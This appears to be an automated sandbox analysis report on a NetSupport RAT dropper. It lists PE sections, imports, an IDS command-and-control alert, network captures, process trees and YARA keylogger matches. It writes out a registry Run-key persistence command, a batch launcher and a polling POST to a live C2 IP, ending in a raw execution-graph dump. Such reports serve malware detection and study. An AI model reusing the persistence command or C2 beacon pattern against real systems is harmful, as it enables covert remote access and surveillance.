.rdata | 0x30000 | 0x9aac | 0x9c00 | b8d3a709e8e2861298e51f270be0f883 | False | 0.45718149038461536 | data | 5.133828516884417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x213d0 | 0xc00 | 7a066b052b7178cd1388c71d17dec570 | False | 0.2789713541666667 | data | 3.2428863859698565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x5c000 | 0xe8 | 0x200 | 0a8129f1f5d2e8ddcb61343ecd6f891a | False | 0.33984375 | data | 2.0959167744603624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5d000 | 0xe034 | 0xe200 | d62594e063ef25acc085c21831d77a75 | False | 0.6341779590707964 | data | 6.802287495720703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0x1fd0 | 0x2000 | 983e78af74da826d9233ebaa3055869a | False | 0.8060302734375 | data | 6.687357530503152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x5d644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x5e18c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x5f738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
RT_ICON | 0x5fca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
RT_ICON | 0x60548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
RT_ICON | 0x613f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
RT_ICON | 0x61858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
RT_ICON | 0x62900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
RT_ICON | 0x64ea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
RT_DIALOG | 0x68c1c | 0x2a2 | data | | | 0.5296735905044511
RT_DIALOG | 0x68ec0 | 0x13a | data | | | 0.6624203821656051
RT_DIALOG | 0x68ffc | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x690f0 | 0x14e | data | | | 0.5868263473053892
RT_DIALOG | 0x69240 | 0x318 | data | | | 0.476010101010101
RT_DIALOG | 0x69558 | 0x24a | data | | | 0.6262798634812287
RT_STRING | 0x697a4 | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x699a0 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x69be8 | 0x1dc | data | | | 0.5105042016806722
RT_STRING | 0x69dc4 | 0xdc | data | | | 0.65
RT_STRING | 0x69ea0 | 0x468 | data | | | 0.375
RT_STRING | 0x6a308 | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x6a46c | 0xe4 | data | | | 0.6359649122807017
RT_STRING | 0x6a550 | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x6a6a8 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x6a790 | 0xe6 | data | | | 0.5695652173913044
RT_GROUP_ICON | 0x6a878 | 0x68 | data | | | 0.7019230769230769
RT_MANIFEST | 0x6a8e0 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-16T12:53:12.437468+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2024 12:53:13.134946108 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 16, 2024 12:53:13.135042906 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 16, 2024 12:53:13.135138035 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 16, 2024 12:53:13.225316048 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 16, 2024 12:53:13.225404024 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 16, 2024 12:53:13.225475073 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 16, 2024 12:53:13.300388098 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:53:13.305720091 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:53:13.305810928 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:53:13.306381941 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:53:13.311589956 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:53:14.178884983 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:53:14.179079056 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:55:03.242310047 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Nov 16, 2024 12:55:03.247806072 CET | 80 | 49731 | 104.26.0.231 | 192.168.2.4
Nov 16, 2024 12:55:03.247929096 CET | 49731 | 80 | 192.168.2.4 | 104.26.0.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2024 12:53:13.263967991 CET | 50895 | 53 | 192.168.2.4 | 1.1.1.1
Nov 16, 2024 12:53:13.295906067 CET | 53 | 50895 | 1.1.1.1 | 192.168.2.4
Nov 16, 2024 12:53:54.121422052 CET | 53 | 50853 | 162.159.36.2 | 192.168.2.4
Nov 16, 2024 12:53:54.777693033 CET | 53 | 54024 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 16, 2024 12:53:13.263967991 CET | 192.168.2.4 | 1.1.1.1 | 0xb9b3 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 16, 2024 12:53:13.295906067 CET | 1.1.1.1 | 192.168.2.4 | 0xb9b3 | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 12:53:13.295906067 CET | 1.1.1.1 | 192.168.2.4 | 0xb9b3 | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 12:53:13.295906067 CET | 1.1.1.1 | 192.168.2.4 | 0xb9b3 | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
• 45.61.128.74 (connection: keep-alive; cmd=poll info=1 ack=1)
• geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | 7688 | C:\Users\Public\Public\Videos\Video\bild.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 12:53:13.225316048 CET | 216 | OUT | POST http://45.61.128.74/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 45.61.128.74
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
Data Raw:
Data Ascii:
                                                                                    Session ID:1
                                                                                    Source IP:192.168.2.4
                                                                                    Source Port:49731
                                                                                    Destination IP:104.26.0.231
                                                                                    Destination Port:80
                                                                                    PID:7688
                                                                                    Process:C:\Users\Public\Public\Videos\Video\bild.exe

                                                                                    Timestamp:Nov 16, 2024 12:53:13.306381941 CET
                                                                                    Bytes transferred:118
                                                                                    Direction:OUT
                                                                                    Data:
                                                                                    GET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache

                                                                                    Timestamp:Nov 16, 2024 12:53:14.178884983 CET
                                                                                    Bytes transferred:1112
                                                                                    Direction:IN
                                                                                    Data:
                                                                                    HTTP/1.1 200 OK
                                                                                    Date: Sat, 16 Nov 2024 11:53:14 GMT
                                                                                    Content-Type: text/html; Charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8e37478588274624-DFW
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cache-Control: private
                                                                                    Set-Cookie: ASPSESSIONIDSSBQDBCQ=MCAKHFBALOOIMPLFMACHLDII; path=/
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                    Vary: Accept-Encoding
                                                                                    cf-apo-via: origin,host
                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PHJwBb7%2Fcm7yYvup65TM%2BxKF21l7ufYS19xIYlJsa0Hdf3Hyj85bSMeT8rp%2BCCpilhUTYOAV6lRKq386XNQDqccQnilW386WIGJqEGuh9YMZcuTSFe6WJ9GNT%2FnA2kEnmp%2F24M8VjR7nwkt"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: f32.7767,-96.7970


                                                                                    Target ID:0
                                                                                    Start time:06:53:09
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:2'138'286 bytes
                                                                                    MD5 hash:166D71E145B2C802ACD2B0A07E070BAD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                    Imagebase:0xef0000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:06:53:10
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Imagebase:0x820000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 29%, ReversingLabs
                                                                                    • Detection: 49%, Virustotal, Browse
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:5
                                                                                    Start time:06:53:20
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                    Imagebase:0x820000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1834399853.0000000000858000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:06:53:28
                                                                                    Start date:16/11/2024
                                                                                    Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                    Imagebase:0x820000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1915079530.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                      Execution Graph

                                                                                      Execution Coverage:10.4%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:9.7%
                                                                                      Total number of Nodes:1492
                                                                                      Total number of Limit Nodes:24
22479->22482 22481->22473 22482->22478 22482->22479 22486 4246ca 7 API calls 2 library calls 22482->22486 22484->22473 22485->22475 22486->22482 22487->22481 22488->22215 22489->22217 22490->22219 22492 407c8e 22491->22492 22496 407cf8 22492->22496 22526 40a145 22492->22526 22495 407d62 22499 407da4 22495->22499 22532 406d0d 67 API calls 22495->22532 22496->22495 22497 40a145 8 API calls 22496->22497 22504 40820b 22496->22504 22497->22496 22499->22221 22501 407bb5 22500->22501 22502 407bae 22500->22502 22503 410e21 79 API calls 22502->22503 22503->22501 22505 408215 __EH_prolog 22504->22505 22533 40137e 22505->22533 22507 408230 22541 409ba2 22507->22541 22513 40825f 22661 40162e 22513->22661 22514 40825b 22514->22513 22522 40a145 8 API calls 22514->22522 22524 4082fa 22514->22524 22665 40b6cb CompareStringW 22514->22665 22518 40835a 22564 401e8e 22518->22564 22522->22514 22560 4083a3 22524->22560 22525 408365 22525->22513 22568 403a20 22525->22568 22578 408409 22525->22578 22527 40a15a 22526->22527 22528 40a15e 22527->22528 23017 40a273 22527->23017 22528->22492 22530 40a16e 22530->22528 22531 40a173 FindClose 22530->22531 22531->22528 22532->22499 22534 401383 __EH_prolog 22533->22534 22667 40c413 22534->22667 22536 4013ba 22540 401413 ___scrt_get_show_window_mode 22536->22540 22673 41cdae 22536->22673 22540->22507 22542 409bad 22541->22542 22544 408246 22542->22544 22698 406e66 67 API calls 22542->22698 22544->22513 22545 4019b1 22544->22545 22546 4019bb __EH_prolog 22545->22546 22553 4019fd 22546->22553 22559 4019e4 22546->22559 22699 40135c 22546->22699 22548 401b16 22702 406d0d 67 API calls 22548->22702 22550 403a20 90 API calls 22555 401b6d 22550->22555 22551 401b26 22551->22550 22551->22559 22552 401bb7 22558 401bea 22552->22558 22552->22559 22703 406d0d 67 API calls 22552->22703 22553->22548 22553->22551 22553->22559 22555->22552 22556 403a20 90 API calls 22555->22556 22556->22555 22557 403a20 90 API calls 22557->22558 22558->22557 22558->22559 
22559->22514 22561 4083b0 22560->22561 22721 40ffb8 GetSystemTime SystemTimeToFileTime 22561->22721 22563 408314 22563->22518 22666 4106c8 65 API calls 22563->22666 22565 401e93 __EH_prolog 22564->22565 22566 401ec7 22565->22566 22723 4018f6 22565->22723 22566->22525 22569 403a30 22568->22569 22570 403a2c 22568->22570 22571 403a5d 22569->22571 22572 403a4f 22569->22572 22570->22525 22944 40276c 90 API calls 3 library calls 22571->22944 22573 403a8f 22572->22573 22943 403203 78 API calls 3 library calls 22572->22943 22573->22525 22576 403a5b 22576->22573 22945 401fd2 67 API calls 22576->22945 22579 408413 __EH_prolog 22578->22579 22580 40844f 22579->22580 22611 408453 22579->22611 22974 4177e7 93 API calls 22579->22974 22581 408478 22580->22581 22586 4084ff 22580->22586 22580->22611 22582 40849a 22581->22582 22581->22611 22975 407a2f 151 API calls 22581->22975 22582->22611 22976 4177e7 93 API calls 22582->22976 22586->22611 22946 405d98 22586->22946 22588 40858c 22588->22611 22954 4080f8 22588->22954 22591 4086e9 22592 40a145 8 API calls 22591->22592 22595 40874d 22591->22595 22592->22595 22594 40c57d 73 API calls 22598 4087a7 _memcmp 22594->22598 22958 407c11 22595->22958 22596 4088d1 22597 4089a0 22596->22597 22603 40891f 22596->22603 22602 4089fb 22597->22602 22614 4089ab 22597->22614 22598->22594 22598->22596 22599 4088ca 22598->22599 22598->22611 22977 4080a6 75 API calls 22598->22977 22978 406d0d 67 API calls 22598->22978 22979 406d0d 67 API calls 22599->22979 22613 40898f 22602->22613 22982 407f88 89 API calls 22602->22982 22606 409dff 4 API calls 22603->22606 22603->22613 22604 408fb5 22608 409437 72 API calls 22604->22608 22605 4089f9 22607 409437 72 API calls 22605->22607 22610 408956 22606->22610 22607->22611 22608->22611 22610->22613 22980 409161 89 API calls 22610->22980 22611->22525 22612 408a64 22612->22604 22625 408acd 22612->22625 22983 40971a 22612->22983 22613->22605 22613->22612 22614->22605 22981 407dc4 93 API calls ___InternalCxxFrameHandler 
22614->22981 22615 40a6a9 8 API calls 22618 408b1c 22615->22618 22621 40a6a9 8 API calls 22618->22621 22620 408aa5 22620->22625 22987 401f18 67 API calls 22620->22987 22630 408b32 22621->22630 22623 408abb 22988 406f67 68 API calls 22623->22988 22625->22615 22626 408d22 22633 408d34 22626->22633 22634 408d48 22626->22634 22651 408c4e 22626->22651 22627 408c1e 22629 408c8e 22627->22629 22631 408c2e 22627->22631 22628 408bd5 22628->22626 22628->22627 22632 4080f8 CharUpperW 22629->22632 22630->22628 22964 409869 22630->22964 22636 408c72 22631->22636 22642 408c3c 22631->22642 22637 408ca9 22632->22637 22638 4090d0 120 API calls 22633->22638 22639 411fa9 68 API calls 22634->22639 22636->22651 22990 4077d4 101 API calls 22636->22990 22645 408cd2 22637->22645 22646 408cd9 22637->22646 22637->22651 22638->22651 22640 408d61 22639->22640 22643 411c40 120 API calls 22640->22643 22989 401f18 67 API calls 22642->22989 22643->22651 22991 407586 77 API calls ___InternalCxxFrameHandler 22645->22991 22992 40900e 85 API calls __EH_prolog 22646->22992 22649 408e6c 22649->22604 22650 408edb 22649->22650 22994 409b6a SetEndOfFile 22649->22994 22969 409a12 22650->22969 22651->22649 22993 401f18 67 API calls 22651->22993 22655 408f35 22656 4094a3 68 API calls 22655->22656 22657 408f40 22656->22657 22657->22604 22658 40a0c3 4 API calls 22657->22658 22659 408f9f 22658->22659 22659->22604 22995 401f18 67 API calls 22659->22995 22662 401640 22661->22662 23016 40c4b6 79 API calls 22662->23016 22665->22514 22666->22518 22668 40c41d __EH_prolog 22667->22668 22669 41cdae new 8 API calls 22668->22669 22671 40c460 22669->22671 22670 41cdae new 8 API calls 22672 40c484 22670->22672 22671->22670 22672->22536 22674 41cdb3 ___std_exception_copy 22673->22674 22675 401400 22674->22675 22685 4246ca 7 API calls 2 library calls 22674->22685 22686 41d83a RaiseException __CxxThrowException@8 new 22674->22686 22687 41d81d RaiseException Concurrency::cancel_current_task __CxxThrowException@8 22674->22687 
22675->22540 22679 40ac66 22675->22679 22680 40ac70 __EH_prolog 22679->22680 22688 40ddc2 73 API calls 22680->22688 22682 40ac82 22689 40ad7e 22682->22689 22685->22674 22688->22682 22690 40ad90 ___scrt_get_show_window_mode 22689->22690 22693 40fce6 22690->22693 22696 40fca6 GetCurrentProcess GetProcessAffinityMask 22693->22696 22697 40acf8 22696->22697 22697->22540 22698->22544 22704 401705 22699->22704 22701 401378 22701->22553 22702->22559 22703->22558 22705 40171b 22704->22705 22716 401773 __vswprintf_c_l 22704->22716 22706 401744 22705->22706 22717 406dd3 67 API calls __vswprintf_c_l 22705->22717 22708 40179a 22706->22708 22713 401760 ___std_exception_copy 22706->22713 22710 4220de 22 API calls 22708->22710 22709 40173a 22718 406e0b 68 API calls 22709->22718 22712 4017a1 22710->22712 22712->22716 22720 406e0b 68 API calls 22712->22720 22713->22716 22719 406e0b 68 API calls 22713->22719 22716->22701 22717->22709 22718->22706 22719->22716 22720->22716 22722 40ffe8 __vswprintf_c_l 22721->22722 22722->22563 22724 4018fb __EH_prolog 22723->22724 22725 40190f 22724->22725 22726 401934 22724->22726 22728 401964 22724->22728 22725->22566 22727 403a20 90 API calls 22726->22727 22727->22725 22732 403e69 22728->22732 22736 403e72 22732->22736 22733 403a20 90 API calls 22733->22736 22734 401980 22734->22725 22737 401da1 22734->22737 22736->22733 22736->22734 22749 40f8f2 22736->22749 22738 401dab __EH_prolog 22737->22738 22757 403aa3 22738->22757 22740 401dd4 22741 401705 69 API calls 22740->22741 22742 401e5b 22740->22742 22743 401deb 22741->22743 22742->22725 22787 40187c 69 API calls 22743->22787 22745 401e03 22747 401e0f 22745->22747 22788 4106e9 